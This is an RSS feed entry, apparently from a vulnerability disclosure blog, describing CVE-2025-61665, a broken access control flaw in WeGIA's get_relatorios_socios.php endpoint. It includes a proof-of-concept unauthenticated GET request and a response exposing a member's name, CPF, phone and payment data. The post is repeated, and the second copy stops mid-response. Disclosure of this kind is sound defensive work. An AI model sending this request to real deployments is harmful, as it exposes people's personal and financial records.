<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>CVE-2025-61665</title><link>https://www.cvehunters.com/p/cve-2025-61665/</link><description>Broken Access Control</description><atom:link href="https://www.cvehunters.com/p/cve-2025-61665/index.xml" rel="self" type="application/rss+xml"/><item><title>CVE-2025-61665</title><link>https://www.cvehunters.com/p/cve-2025-61665/</link><guid>https://www.cvehunters.com/p/cve-2025-61665/</guid><description>&amp;lt;h2 id=&amp;#34;cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint&amp;#34;&amp;gt;CVE-2025-61665: Broken Access Control in &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;#34; target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
&amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;tipo_socio&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tipo_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;operador&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;valor&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tag&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&amp;amp;amp;tipo_pessoa=x&amp;amp;amp;operador=maior_q&amp;amp;amp;valor=&amp;amp;amp;tag=x&amp;amp;amp;status=x HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;response-snippet&amp;#34;&amp;gt;Response (snippet):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Date: Sun, 31 Aug 2025 20:00:43 GMT
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Server: Apache/2.4.62 (Debian)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Vary: Accept-Encoding
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 204
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Keep-Alive: timeout=5, max=100
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: Keep-Alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: text/html; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;[{
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;nome&amp;amp;#34;: &amp;amp;#34;Luis Barango&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;telefone&amp;amp;#34;: &amp;amp;#34;(71)98642-1278&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;cpf&amp;amp;#34;: &amp;amp;#34;649.659.320-56&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;valor_periodo&amp;amp;#34;: &amp;amp;#34;5000.00&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;email&amp;amp;#34;: &amp;amp;#34;teste@teste.com&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;tipo&amp;amp;#34;: &amp;amp;#34;F\u00edsica - Mensal - Boleto&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;status&amp;amp;#34;: &amp;amp;#34;Ativo&amp;amp;#34;,
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt; &amp;amp;#34;tag&amp;amp;#34;: &amp;amp;#34;Solicitante&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;}]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-61665/image.png&amp;#34;
width=&amp;#34;1534&amp;#34;
height=&amp;#34;431&amp;#34;
srcset=&amp;#34;/p/cve-2025-61665/image_hu_14ad2691788bd7c6.png 480w, /p/cve-2025-61665/image_hu_16f20d6fda007cbd.png 1024w&amp;#34;
loading=&amp;#34;lazy&amp;#34;
class=&amp;#34;gallery-image&amp;#34;
data-flex-grow=&amp;#34;355&amp;#34;
data-flex-basis=&amp;#34;854px&amp;#34;
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-61665-broken-access-control-in-get_relatorios_sociosphp-endpoint&amp;#34;&amp;gt;CVE-2025-61665: Broken Access Control in &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;#34; target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
&amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-61665&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Broken Access Control vulnerability was identified in the &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows unauthenticated attackers to directly access sensitive personal and financial information of members without requiring authentication or authorization.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;get_relatorios_socios.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;tipo_socio&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tipo_pessoa&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;operador&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;valor&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;tag&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;status&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /WeGIA/html/socio/sistema/get_relatorios_socios.php?tipo_socio=x&amp;amp;amp;tipo_pessoa=x&amp;amp;amp;operador=maior_q&amp;amp;amp;valor=&amp;amp;amp;tag=x&amp;amp;amp;status=x HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/relatorios_socios.php
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga_F8DXBXLV8J=GS2.1.s1756605228$o47$g1$t1756611307$j47$l0$h0; _ga=GA1.1.424189364.1749063834
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;response-snippet&amp;#34;&amp;gt;Response (snippet):
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;HTTP/1.1 200 OK
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Date: Sun, 31 Aug 2025 20:00:43 GMT
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Server: Apache/2.4.62 (Debian)
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Vary: Accept-Encoding
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 204
